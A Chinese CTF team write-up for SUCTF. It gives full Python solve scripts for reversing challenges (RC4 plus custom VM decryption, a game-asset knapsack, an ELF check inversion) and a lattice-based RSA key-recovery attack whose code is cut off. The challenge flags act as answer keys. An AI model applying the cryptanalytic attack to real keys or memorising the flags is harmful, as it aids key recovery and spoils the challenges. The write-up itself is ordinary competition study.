战队:不爆零就胜利

感谢Rewind、Bewater、SdTVdp师傅的倾力付出,本次比赛对我们来说只是一个训练赛,见识见识难题是什么样子的,让我们更加进步。希望未来各位有更好的努力吧。

MISC(Rewind)

suu-signin

点击链接

即可看到flag

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
import base64
def base64_decode(encoded_string):
try:
decoded_bytes = base64.b64decode(encoded_string)
decoded_string = decoded_bytes.decode('utf-8')
return decoded_string
except base64.binascii.Error:
print("输入的不是有效的Base64编码字符串。")
except UnicodeDecodeError:
print("解码后的字节无法以UTF-8编码转换为字符串。")
encoded = ''' ZmxhZ3tJX0xPVkVfRkVOR1NIVUFOR30= '''
decoded = base64_decode(encoded)
print(decoded)

flag{I_LOVE_FENGSHUANG}

woc怎么还有核武器

REVERSE(SdTVdp)

SU_MvsicPlayer

一个 Electron 应用。核心逻辑通常位于 resources/app.asar 中。通过静态分析(Strings/Grep),在 app.asar 中发现了关键字符串 SUMUSICPLAYER,为 RC4 加密的密钥。源码中还包含一段自定义虚拟机(VM)混淆逻辑,用于对音频数据块进行块加密,本质是虚拟机逆向。

2. 加密流程解析

VM 加密细节:

  • 数据结构:以 64 字节为一个 Block,分为左右两部分(各 8 个 32-bit 整数)。
  • 轮密钥派生:基于初始向量 H 和一组硬编码常量(如 0x73756572 等)派生 4 轮子密钥。
  • 混合变换:使用 rol32ror32 以及ffunc进行轮内变换。

解密实现步骤

  1. VM 逆向解密
    • 逆序应用 4 轮变换。
    • 使用 dec_pair 还原被混淆的整数对。
    • 逐块递归更新状态向量 H
  2. 去除 Padding:解密完成后,根据 PKCS#7 风格读取最后一个字节并去除填充。
  3. MD5 校验:计算还原后 WAV 文件的 MD5 哈希。
  4. flag为SUCTF{16ac79d3510d6ea4b5338fade80459b8}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
import hashlib
from pathlib import Path

# RC4 implementation
def rc4(key, data):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) & 0xff
S[i], S[j] = S[j], S[i]

i = 0
j = 0
res = bytearray()
for char in data:
i = (i + 1) & 0xff
j = (j + S[i]) & 0xff
S[i], S[j] = S[j], S[i]
res.append(char ^ S[(S[i] + S[j]) & 0xff])
return bytes(res)

MASK32 = 0xffffffff

def rol32(x, n):
return ((x << n) | (x >> (32 - n))) & MASK32

def ror32(x, n):
return ((x >> n) | (x << (32 - n))) & MASK32

def dec_pair(x, y, k):
y0 = ror32(y ^ x, 3)
x0 = rol32(((x ^ k) - y0) & MASK32, 8)
return x0 & MASK32, y0 & MASK32

def derive_roundkeys(H):
h = list(H)
d8 = 0x73756572
dc = 0
rks = []
for r in range(4):
d8 = (d8 + 0x70336364 + r) & MASK32
dc = (dc + 0x70336364) & MASK32

h0 = (rol32(h[1] ^ d8, 3) + h[0]) & MASK32
h1 = (rol32(h[2] ^ h0, 5) + h[1]) & MASK32
h2 = (rol32(h[3] ^ h1, 7) + h[2]) & MASK32
h3 = (rol32(h[4] ^ h2, 11) + h[3]) & MASK32
h4 = (rol32(h[5] ^ h3, 13) + h[4]) & MASK32
h5 = (rol32(h[6] ^ h4, 17) + h[5]) & MASK32
h6 = (rol32(h[7] ^ h5, 19) + h[6]) & MASK32
h7 = (rol32(h0 ^ h6, 23) + h[7]) & MASK32
h = [h0, h1, h2, h3, h4, h5, h6, h7]

ks = [
(h0 ^ h2 ^ d8) & MASK32,
(h1 ^ h3 ^ ((d8 + 0x62616F7A) & MASK32)) & MASK32,
(h4 ^ h6 ^ ((d8 + 0x6F6E6777) & MASK32)) & MASK32,
(h5 ^ h7 ^ ((d8 + 0x696E6221) & MASK32)) & MASK32,
]
km = [
(h0 + h4) & MASK32,
(h1 + h5) & MASK32,
(h2 + h6) & MASK32,
(h3 + h7) & MASK32,
(h0 ^ h5) & MASK32,
(h1 ^ h6) & MASK32,
(h2 ^ h7) & MASK32,
(h3 ^ h4) & MASK32,
]
rks.append((dc, ks, km))
return rks

def ffunc(T, dc, km):
F = [0] * 8
for i in range(8):
a = T[i]
b = T[(i + 1) & 7]
c = T[(i + 3) & 7]
f = ((((a << 4) & MASK32) ^ (a >> 5)) + b) & MASK32
f ^= (dc + km[i]) & MASK32
rol_amt = 8 if i == 7 else i + 1
shr_amt = 0 if i == 7 else i + 1
f = (f + (rol32(c, rol_amt) ^ (dc >> shr_amt))) & MASK32
F[i] = f
return F

def dec_block(cipher_bytes, H):
W = [int.from_bytes(cipher_bytes[i:i+4], "big") for i in range(0, 64, 4)]
L = W[:8]
R = W[8:]

rks = derive_roundkeys(H)

for dc, ks, km in reversed(rks):
T = L[:]
F = ffunc(T, dc, km)
L_prev = [(R[i] ^ F[i]) & MASK32 for i in range(8)]
R_prev = [0] * 8
for i in range(4):
R_prev[2 * i], R_prev[2 * i + 1] = dec_pair(
T[2 * i], T[2 * i + 1], ks[i]
)
L, R = L_prev, R_prev

plain_words = L + R
H_next = [(W[i] ^ W[i + 8]) & MASK32 for i in range(8)]
return b"".join(w.to_bytes(4, "big") for w in plain_words), H_next

def main():
encrypted_file = Path("ddd.su_mv_enc")
if not encrypted_file.exists():
print(f"Error: {encrypted_file} not found.")
return

data = encrypted_file.read_bytes()
assert data[:4] == b"SVE4"
payload = data[4:]

# Step 1: RC4 Decryption
rc4_key = b"SUMUSICPLAYER"
rc4_decrypted = rc4(rc4_key, payload)

# Step 2: VM Decryption
H = [
0x00010203, 0x04050607, 0x08090A0B, 0x0C0D0E0F,
0x10111213, 0x14151617, 0x18191A1B, 0x1C1D1E1F
]

plain = bytearray()
for i in range(0, len(rc4_decrypted), 64):
blk = rc4_decrypted[i:i + 64]
p, H = dec_block(blk, H)
plain += p

# Remove padding
pad = plain[-1]
if 0 < pad <= 64:
wav = bytes(plain[:-pad])
else:
wav = bytes(plain)

md5 = hashlib.md5(wav).hexdigest()
print("Decrypted WAV Length:", len(wav))
print("MD5 Hash (Flag):", md5)

# Save the decrypted WAV
with open("ddd.wav", "wb") as f:
f.write(wav)

if __name__ == "__main__":
main()

SU_Ezgal

我是gal大蛇

1. 数据提取

首先,从 esaygal_Data/resources.assets 中提取游戏数据 story.json

  • 偏移量: 29152
  • 长度: 85145 字节

提取后的 story.json 包含 60 个节点,每个节点有两个选项(A/B),每个选项带有 weightvaluemarker 属性。

  • 目标限制: maxWeight = 132
  • 目标数值: trueEndingValue = 322

通过对 GameAssembly.dllglobal-metadata.dat 的分析,定位到核心 Flag 生成方法 FlagUtility.BuildTrueEndingFlag

  • 类名: FlagUtility
  • 方法: BuildTrueEndingFlag(List<string> markers)
  • 算法逻辑:
    1. 将所有选择的 marker 字符串按顺序拼接。
    2. 对拼接后的字符串进行 UTF-8 编码。
    3. 计算 MD5 哈希值。
    4. 将哈希值转换为小写十六进制字符串。
    5. 格式化为 SUCTF{hex_md5}

题目要求在 weight 之和 ≤ 132 的前提下,寻找 value 之和恰好等于 322 的路径,写代码解方程即可

使用动态规划算法求解:

  • 状态定义: dp[w] 表示当前总重量为 w 时能达到的最大价值及其对应的路径。
  • 状态转移: 对于每个节点,选择选项 A 或 B,更新 DP 表。

**求解脚本 **

通过运行求解脚本,发现唯一解:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import json
import hashlib

data = json.load(open('story.json', 'r', encoding='utf-8'))
nodes = data['nodes']
max_w = 132
target_v = 322

dp = {0: (0, [])}
for node in nodes:
new_dp = {}
for w, (v, path) in dp.items():
for idx, choice in enumerate(node['choices']):
nw = w + choice['weight']
nv = v + choice['value']
if nw <= max_w:
if nw not in new_dp or new_dp[nw][0] < nv:
new_dp[nw] = (nv, path + [idx])
dp = new_dp

sol = [(w, p) for w, (v, p) in dp.items() if v == target_v]
if sol:
m = "".join(nodes[i]['choices'][idx]['marker'] for i, idx in enumerate(sol[0][1]))
print("MARKER:" + m)
print("FLAG:SUCTF{" + hashlib.md5(m.encode()).hexdigest() + "}")
else:
print("NO SOLUTION")

  • Weight: 132
  • Value: 322
  • 选择序列 (A/B): BBABAABAAAAAAABBABAAAABBBBABBBBBBBBAAABAAABABAAABBBABBBBAAAB
  • 拼接 Marker 字符串: m1bm2bm3am4bm5am6am7bm8am9am10am11am12am13am14am15bm16bm17am18bm19am20am21am22am23bm24bm25bm26bm27am28bm29bm30bm31bm32bm33bm34bm35bm36am37am38am39bm40am41am42am43bm44am45bm46am47am48am49bm50bm51bm52am53bm54bm55bm56bm57am58am59am60b

4. 计算 Flag

对拼接后的字符串计算 MD5:

  • MD5: 92d1c2c3f6e55fabbc3a6ffde57c7341
  • Flag: SUCTF{92d1c2c3f6e55fabbc3a6ffde57c7341}

su_old_bin

附件核心在 old_bin/attachment,主可执行为 copy_b0520_to_a7f00.elf(与 seg0.elf 同源)。
整体做法是:

  1. 逆出主校验函数 0x120008658 的完整数据流。
  2. 还原各轮函数(0x7e280x9938 等)并做正逆验证。
  3. 逆向还原输入缓冲区,最终得到满足校验的 64 字节字符串。

1) 入口校验链

高层调用链可定位到:

  • 0x120009b7c -> 0x120008658

0x8658 内部流程(简化):

  1. 先构造 buf30[64]
    buf30[i] = in[i] ^ (C20[(7*i)&0x3f] + i)
  2. 0x120007e28(buf30, 64, ctx) 做 6 轮字节变换。
  3. 生成 buf90[64]
    buf90[i] = SBOX[ buf30[C28[i]] ^ C30[i%48] ] ^ C20[i]
  4. 每 16 字节调用一次 0x120009938(共 4 块)。
  5. TARGET(64 字节)逐字节比较,全零即通过。

2) 0x9938 的性质

0x9938 是可逆分组变换(4x32-bit 输入 -> 4x32-bit 输出),其轮函数核心在:

  • 0x9898(单轮混合)
  • 0x9810 / 0x9714 / 0x93a0 / 0x92e8 / 0x9184 / 0x9098
  • 密钥扩展 0x9428

可通过实现 enc_block/dec_block 并对拍确认互逆。

C20/C28/C30 中,C30 要按 0x7ff8 初始化逻辑动态生成。
如果 C30 取错,逆推会在 SBOX preimage7e28 preimage 直接失败。

最终可用的 C30 为:

1
323c28802000801038c810208080286470f0808000967c20d0c0000030b4b8f020808076cca860604080aa7058500040

代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
from __future__ import annotations

import struct
from pathlib import Path

MASK32 = 0xFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF

BIN_PATH = Path(r"C:\Users\SdTVdp\Downloads\Compressed\attachment_2\old_bin\attachment\copy_b0520_to_a7f00.elf")
BASE = 0x120000000

# From runtime-resolved context init (0x120007ff8)
CTX_WORDS = [
0xE07AB377D2253ED4,
0x9590BF229A1C558D,
0x214E7D363E18DA4D,
0xC0934E7207D31515,
]
C20 = bytes.fromhex(
"5c117ca10116c60c732ef7ff2604f84ee0a11b496a1547f27c3257755225cc4a"
"0ef38cd2e44924e251ed84072747aa06e69605009a8b3506114e40b407babccd"
)
C28 = bytes.fromhex(
"0530233b0c1404123f0e0b3d3e36252735002f0f311c15020d26013a2a1f1a17"
"181e083c32211d292d2e37091903331b39072c0a161128202b34131038240622"
)
C30 = bytes.fromhex(
"ba68a0b0a080005688701000c000c8aca010e040001e7c304060400020d840b0"
"e04000eafc6080c0c000942c88c0c040"
)


def u32(x: int) -> int:
return x & MASK32


def rol32(x: int, n: int) -> int:
x &= MASK32
return ((x << n) | (x >> (32 - n))) & MASK32


def rol64(x: int, n: int) -> int:
x &= MASK64
return ((x << n) | (x >> (64 - n))) & MASK64


def read_u64(off: int) -> int:
data = BIN_PATH.read_bytes()
return struct.unpack_from("<Q", data, off - BASE)[0]


def read_blob(addr: int, n: int) -> bytes:
data = BIN_PATH.read_bytes()
return data[addr - BASE : addr - BASE + n]


# Runtime-resolved base used by the firmware logic (matches execution trace).
# Note: raw file GOT may differ before relocations.
GLOBAL_BASE = 0x12007E848

SBOX = read_blob(GLOBAL_BASE - 0x1940, 0x100)
TARGET = read_blob(GLOBAL_BASE - 0x1840, 0x40)
K16 = read_blob(GLOBAL_BASE - 0x16E0, 0x10)
FK_RAW = read_blob(GLOBAL_BASE - 0x16B0, 0x20)
CK_RAW = read_blob(GLOBAL_BASE - 0x1690, 0x100) # 32 qwords
TBL_1590 = read_blob(GLOBAL_BASE - 0x1590, 0x100)

FK = [struct.unpack_from("<Q", FK_RAW, i * 8)[0] & MASK32 for i in range(4)]
CK = [struct.unpack_from("<Q", CK_RAW, i * 8)[0] & MASK32 for i in range(32)]
STATE1 = [int.from_bytes(K16[i * 4 : i * 4 + 4], "big") for i in range(4)]


def f9104(x: int) -> int:
x = (x + 0x37) & 0xFF
hi = (x >> 4) & 0xF
lo = x & 0xF
return TBL_1590[(hi << 4) + lo]


def f9184(x: int) -> int:
x &= MASK32
b0 = (x >> 24) & 0xFF
b1 = (x >> 16) & 0xFF
b2 = (x >> 8) & 0xFF
b3 = x & 0xFF
y0 = f9104(b0)
y1 = f9104(b1)
y2 = f9104(b2)
y3 = f9104(b3)
return ((y0 << 24) | (y1 << 16) | (y2 << 8) | y3) & MASK32


def f9098(x: int, n: int) -> int:
return rol32(x, n) ^ 0xDEADBEEF


def f9714(x: int) -> int:
s1 = f9098(x, 3) ^ x
s1 ^= f9098(x, 11)
s1 ^= f9098(x, 19)
return (s1 ^ f9098(x, 27) ^ 0x12345678) & MASK32


def f92e8(x: int) -> int:
return (f9098(x, 15) ^ x ^ f9098(x, 23) ^ 0xCAFEBABE) & MASK32


def f93a0(x: int) -> int:
return f92e8(f9184(x))


def f9810(x: int) -> int:
return f9714(f9184(x))


def f9898(a0: int, a1: int, a2: int, a3: int, t0: int) -> int:
tmp = u32(a1 ^ a2 ^ a3 ^ t0)
v = f9810(tmp)
return u32((v ^ a0) + 0x1337)


def key_expand(state_words: list[int]) -> list[int]:
out = [0] * 36
t = [u32((state_words[i] ^ FK[i]) + i) for i in range(4)]
out[4] = u32(t[0] ^ f93a0(u32(t[1] ^ t[2] ^ t[3] ^ CK[0])))
out[5] = u32(t[1] ^ f93a0(u32(t[2] ^ t[3] ^ out[4] ^ CK[1])))
out[6] = u32(t[2] ^ f93a0(u32(t[3] ^ out[4] ^ out[5] ^ CK[2])))
out[7] = u32(t[3] ^ f93a0(u32(out[4] ^ out[5] ^ out[6] ^ CK[3])))
for i in range(4, 32):
out[i + 4] = u32((out[i] ^ f93a0(u32(out[i + 1] ^ out[i + 2] ^ out[i + 3] ^ CK[i]))) + i)
return out


ROUND_KEYS = key_expand(STATE1)


def enc_block(words: list[int]) -> list[int]:
s = [u32(w ^ 0xAAAAAAAA) for w in words]
for r in range(34):
rk = ROUND_KEYS[(r & 0x1F) + 4]
t = f9898(s[0], s[1], s[2], s[3], rk)
s = [s[1], s[2], s[3], t]
if r in (8, 16, 24):
s[0] = u32(s[0] ^ 0x55555555)
s[1] = u32(s[1] ^ 0xAAAAAAAA)
y0 = u32(s[3] ^ 0x12345678)
y3 = u32(s[0] ^ 0x87654321)
y1 = u32(s[2] ^ 0xABCDEF01)
y2 = u32(s[1] ^ 0x10FEDCBA)
return [y0, y1, y2, y3]


def dec_block(words: list[int]) -> list[int]:
# Inverse of enc_block
s3 = u32(words[0] ^ 0x12345678)
s0 = u32(words[3] ^ 0x87654321)
s2 = u32(words[1] ^ 0xABCDEF01)
s1 = u32(words[2] ^ 0x10FEDCBA)
s = [s0, s1, s2, s3]
for r in range(33, -1, -1):
if r in (8, 16, 24):
s[0] = u32(s[0] ^ 0x55555555)
s[1] = u32(s[1] ^ 0xAAAAAAAA)
old1, old2, old3, t = s
rk = ROUND_KEYS[(r & 0x1F) + 4]
tmp = u32(old1 ^ old2 ^ old3 ^ rk)
old0 = u32(f9810(tmp) ^ u32(t - 0x1337))
s = [old0, old1, old2, old3]
return [u32(w ^ 0xAAAAAAAA) for w in s]


def prng_step(state: list[int]) -> int:
# xoroshiro256** style, matches 0x1200074a0
v1 = state[1]
ret = rol64((v1 * 5) & MASK64, 7)
ret = (ret * 9) & MASK64
t = (state[1] << 17) & MASK64

state[2] ^= state[0]
state[3] ^= state[1]
state[1] ^= state[2]
state[0] ^= state[3]
state[2] ^= t
state[3] = rol64(state[3], 45)
return ret


def forward_7e28(buf: bytearray) -> None:
st = CTX_WORDS.copy()
for rnd in range(6):
k = prng_step(st) & 0x3F
add_r = (13 * rnd) & 0xFF
for i in range(len(buf)):
b = buf[i]
b ^= (k + i + rnd) & 0xFF
b = ((b << 1) | (b >> 7)) & 0xFF
b ^= SBOX[(b + add_r) & 0xFF]
buf[i] = b


def invert_7e28(buf: bytearray) -> None:
st = CTX_WORDS.copy()
ks = [(prng_step(st) & 0x3F) for _ in range(6)]

def byte_forward(idx: int, x: int) -> int:
b = x & 0xFF
for rnd in range(6):
b ^= (ks[rnd] + idx + rnd) & 0xFF
b = ((b << 1) | (b >> 7)) & 0xFF
b ^= SBOX[(b + (13 * rnd)) & 0xFF]
return b

for i in range(len(buf)):
want = buf[i]
cand = [x for x in range(256) if byte_forward(i, x) == want]
if not cand:
raise RuntimeError("7e28 inverse has no preimage")
# Pick one valid preimage; for this sample it is unique for all 64 bytes.
buf[i] = cand[0]


def main() -> None:
sbox_pre = {y: [] for y in range(256)}
for x, y in enumerate(SBOX):
sbox_pre[y].append(x)

# 1) invert final 4x16-byte block transform to recover buf90.
need_buf90 = bytearray(64)
for blk in range(4):
off = blk * 16
yw = [int.from_bytes(TARGET[off + i * 4 : off + (i + 1) * 4], "big") for i in range(4)]
xw = dec_block(yw)
chk = enc_block(xw)
if chk != yw:
raise RuntimeError("block inverse check failed")
for i, w in enumerate(xw):
need_buf90[off + i * 4 : off + (i + 1) * 4] = w.to_bytes(4, "big")

# 2) invert buf90 <- buf30_after_7e28 via c28/c30/sbox/c20.
# SBOX here is not guaranteed to be bijective, so keep candidate sets.
cand_after = [set(range(256)) for _ in range(64)]
for i in range(64):
t = need_buf90[i] ^ C20[i]
j = C28[i] & 0x3F
pre_vals = sbox_pre.get(t, [])
if not pre_vals:
raise RuntimeError(f"no SBOX preimage for byte {i}")
vals = {p ^ C30[i % 48] for p in pre_vals}
cand_after[j] &= vals

if any(len(s) == 0 for s in cand_after):
raise RuntimeError("no candidate for some buf30_after byte")

# 3) invert 0x7e28 byte-wise using candidate sets.
st = CTX_WORDS.copy()
ks = [(prng_step(st) & 0x3F) for _ in range(6)]

def byte_forward(idx: int, x: int) -> int:
b = x & 0xFF
for rnd in range(6):
b ^= (ks[rnd] + idx + rnd) & 0xFF
b = ((b << 1) | (b >> 7)) & 0xFF
b ^= SBOX[(b + (13 * rnd)) & 0xFF]
return b

inv7 = []
for idx in range(64):
d = {y: [] for y in range(256)}
for x in range(256):
y = byte_forward(idx, x)
d[y].append(x)
inv7.append(d)

buf30_before = bytearray(64)
buf30_after = bytearray(64)
for i in range(64):
chosen_y = None
chosen_x = None
for y in cand_after[i]:
xs = inv7[i][y]
if xs:
chosen_y = y
chosen_x = xs[0]
break
if chosen_y is None:
raise RuntimeError(f"no 7e28 preimage for byte index {i}")
buf30_after[i] = chosen_y
buf30_before[i] = chosen_x

# 4) invert initial mask stage (assume len=64, i.e. all bytes user-controlled)
inp = bytearray(64)
for i in range(64):
add = (C20[(i * 7) & 0x3F] + i) & 0xFF
inp[i] = buf30_before[i] ^ add

# Validate forward full pipeline with n=64
# stage A
stage = bytearray(64)
for i in range(64):
stage[i] = inp[i] ^ ((C20[(i * 7) & 0x3F] + i) & 0xFF)
# stage B
forward_7e28(stage)
# stage C -> buf90
buf90 = bytearray(64)
for i in range(64):
idx = C28[i] & 0x3F
v = stage[idx] ^ C30[i % 48]
v = SBOX[v]
v ^= C20[i]
buf90[i] = v
# stage D -> final bytes
out = bytearray(64)
for blk in range(4):
off = blk * 16
xw = [int.from_bytes(buf90[off + i * 4 : off + (i + 1) * 4], "big") for i in range(4)]
yw = enc_block(xw)
for i, w in enumerate(yw):
out[off + i * 4 : off + (i + 1) * 4] = w.to_bytes(4, "big")

ok = out == TARGET
print(f"GLOBAL_BASE = {GLOBAL_BASE:#x}")
print(f"target_match = {ok}")
print(f"input_len = {len(inp)}")
print("input_hex =", inp.hex())
printable = ''.join(chr(c) if 32 <= c < 127 else '.' for c in inp)
print("input_printable =", printable)

# Check whether shorter n could satisfy fixed-padding constraint.
min_n = None
for n in range(0, 65):
good = True
for i in range(n, 64):
forced = ((i * 17) & 0xFF) ^ ((C20[(i * 7) & 0x3F] + i) & 0xFF)
if buf30_before[i] != forced:
good = False
break
if good:
min_n = n
break
print("min_feasible_n =", min_n)


if __name__ == "__main__":
main()

设最终比较目标为 TARGET[64]

  1. 先对每个 16-byte 块做 dec_block,拿到 buf90
  2. buf90 <- buf30_after_7e28
    C28/C30/C20/SBOX^-1 还原每个位置候选。
  3. 0x7e28
    该函数是按字节独立演化(索引相关),每个位置可 0..255 枚举反解。
  4. 逆首层掩码:
    in[i] = buf30_before[i] ^ (C20[(7*i)&0x3f] + i)
  5. 结合可打印约束和 flag 结构筛选,得到唯一可提交串,flag为flag{3putis6omqi3u7034722576kpze4udduejoko8zr3e6ozvp8mosm6065q1}

CRYPTO(Bewater)

SU_RSA

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
from math import isqrt
from itertools import combinations

from Crypto.Util.number import long_to_bytes
from sympy import symbols, Poly, expand, resultant
from sympy.polys.polytools import degree
from fpylll import IntegerMatrix, LLL


# =========================
# challenge data
# =========================
N = 92365041570462372694496496651667282908316053786471083312533551094859358939662811192309357413068144836081960414672809769129814451275108424713386238306177182140825824252259184919841474891970355752207481543452578432953022195722010812705782306205731767157651271014273754883051030386962308159187190936437331002989
e = 11633089755359155730032854124284730740460545725089199775211869030086463048569466235700655506823303064222805939489197357035944885122664953614035988089509444102297006881388753631007277010431324677648173190960390699105090653811124088765949042560547808833065231166764686483281256406724066581962151811900972309623
c = 49076508879433623834318443639845805924702010367241415781597554940403049101497178045621761451552507006243991929325463399667338925714447188113564536460416310188762062899293650186455723696904179965363708611266517356567118662976228548528309585295570466538477670197066337800061504038617109642090869630694149973251
S = 19240297841264250428793286039359194954582584333143975177275208231751442091402057804865382456405620130960721382582620473853285822817245042321797974264381440

# bounds (theoretical maximum)
X_BOUND = 2 ** 399 # x < 2^(1024*0.39) ≈ 2^399
K_BOUND = 2 ** 338 # k < d < 2^(1024*0.33) ≈ 2^338

# A = N - S + 1, phi = A - x
A = N - S + 1


# =========================
# helpers
# =========================
x, y = symbols("x y") # x = leak error, y = k

def monomial_key(m):
"""sort monomials by total degree, then x degree, then y degree"""
a, b = m
return (a + b, a, b)

def poly_to_dict(expr):
"""Convert sympy expr in x,y to dict {(i,j): coeff}"""
p = Poly(expand(expr), x, y, domain='ZZ')
d = {}
for monom, coeff in p.terms():
d[monom] = int(coeff)
return d

def build_lattice(f_expr, modulus, Xb, Yb, m=3):
"""
Build Coppersmith lattice for bivariate modular equation.

Shifts: x^i y^j f(x,y)^u * modulus^(m-u)
for u = 0..m, i = 0..m-u, j = 0..m-u
"""
shifts = []
for u in range(m + 1):
fu = expand(f_expr ** u)
scale = modulus ** (m - u)
lim = m - u
for i in range(lim + 1):
for j in range(lim + 1):
g = expand((x ** i) * (y ** j) * fu * scale)
shifts.append(g)

# collect all monomials appearing in shifts
monomials = set()
shift_dicts = []
for g in shifts:
gd = poly_to_dict(g)
shift_dicts.append(gd)
monomials.update(gd.keys())

monomials = sorted(monomials, key=monomial_key)

# build integer matrix with scaled columns
nrows = len(shifts)
ncols = len(monomials)
M = IntegerMatrix(nrows, ncols)
for r, gd in enumerate(shift_dicts):
for cidx, (a, b) in enumerate(monomials):
coeff = gd.get((a, b), 0)
if coeff != 0:
coeff *= (Xb ** a) * (Yb ** b)
M[r, cidx] = coeff

return M, monomials

def vector_to_poly(vec, monomials, Xb, Yb, tol=10):
"""
Convert a lattice row vector back to a polynomial in x,y.
If division by scaling factor leaves a remainder > tol, return None.
"""
expr = 0
for coeff, (a, b) in zip(vec, monomials):
scale = (Xb ** a) * (Yb ** b)
if coeff % scale == 0:
expr += (coeff // scale) * (x ** a) * (y ** b)
else:
# small remainder allowed to cope with numerical noise
if abs(coeff % scale) <= tol:
expr += (coeff // scale) * (x ** a) * (y ** b)
else:
return None
return Poly(expand(expr), x, y, domain='ZZ')

def small_integer_roots(poly, var, bound):
"""
Return all small integer roots of a univariate polynomial (sympy Poly).
"""
cand = set()
try:
# exact roots
roots = poly.ground_roots()
for r in roots:
try:
z = int(r)
if abs(z) < bound:
cand.add(z)
except:
pass
except:
pass

# factor and extract linear factors
try:
factors = poly.factor_list()[1]
for fac, _ in factors:
if fac.degree() == 1:
coeffs = fac.all_coeffs()
a = int(coeffs[0])
b = int(coeffs[1])
if a != 0 and (-b) % a == 0:
root = (-b) // a
if abs(root) < bound:
cand.add(root)
except:
pass

return sorted(cand)

def try_recover_from_polys(polys, Xb, Yb):
"""
Take a list of polynomials in x,y, eliminate y by resultants,
and try to recover integer (x,k) pair.
"""
from itertools import combinations
for P1, P2 in combinations(polys, 2):
if P1 is None or P2 is None:
continue
if P1.is_zero or P2.is_zero:
continue
if degree(P1, gen=y) <= 0 or degree(P2, gen=y) <= 0:
continue

try:
R = resultant(P1.as_expr(), P2.as_expr(), y)
R = Poly(expand(R), x, domain='ZZ')
except Exception:
continue

if R.is_zero or R.degree() <= 0:
continue

xs = small_integer_roots(R, x, Xb)
for xr in xs:
try:
Py = Poly(P1.eval(x, xr), y, domain='ZZ')
except:
continue
ys = small_integer_roots(Py, y, Yb)
for yr in ys:
if P1.eval({x: xr, y: yr}) == 0 and P2.eval({x: xr, y: yr}) == 0:
return xr, yr
return None

def recover_flag(xr, kr):
"""
Given x and k, reconstruct d, p, q and decrypt.
"""
phi = A - xr
if phi <= 0:
return None

# equation: e*d = 1 + k*phi => d = (k*phi + 1)/e
num = kr * phi + 1
if num % e != 0:
return None
d = num // e

# reconstruct p+q and solve quadratic
s = N - phi + 1 # p+q
delta = s * s - 4 * N
if delta < 0:
return None
t = isqrt(delta)
if t * t != delta:
return None

p = (s + t) // 2
q = (s - t) // 2
if p * q != N:
return None

m = pow(c, d, N)
flag = long_to_bytes(m)
return {
"x": xr,
"k": kr,
"phi": phi,
"d": d,
"p": p,
"q": q,
"flag": flag
}


# =========================
# main attack
# =========================
def main():
f_expr = y * (A - x) + 1 # f(x,k) = k*(A-x)+1 ≡ 0 (mod e)

# try increasing lattice dimensions
for m in [2, 3, 4, 5, 6]:
print(f"[*] trying lattice parameter m = {m}")

M, monomials = build_lattice(f_expr, e, X_BOUND, K_BOUND, m=m)
print(f" lattice dimension: {M.nrows} rows, {M.ncols} cols")

LLL.reduction(M)

# collect all reduced rows as polynomials
polys = []
for r in range(M.nrows):
row = [int(M[r, c]) for c in range(M.ncols)]
P = vector_to_poly(row, monomials, X_BOUND, K_BOUND)
if P is not None and not P.is_zero:
polys.append(P)

print(f" recovered {len(polys)} candidate polynomials")

if len(polys) < 2:
print(" insufficient polynomials, try larger m")
continue

# try to extract root from pairs of polynomials
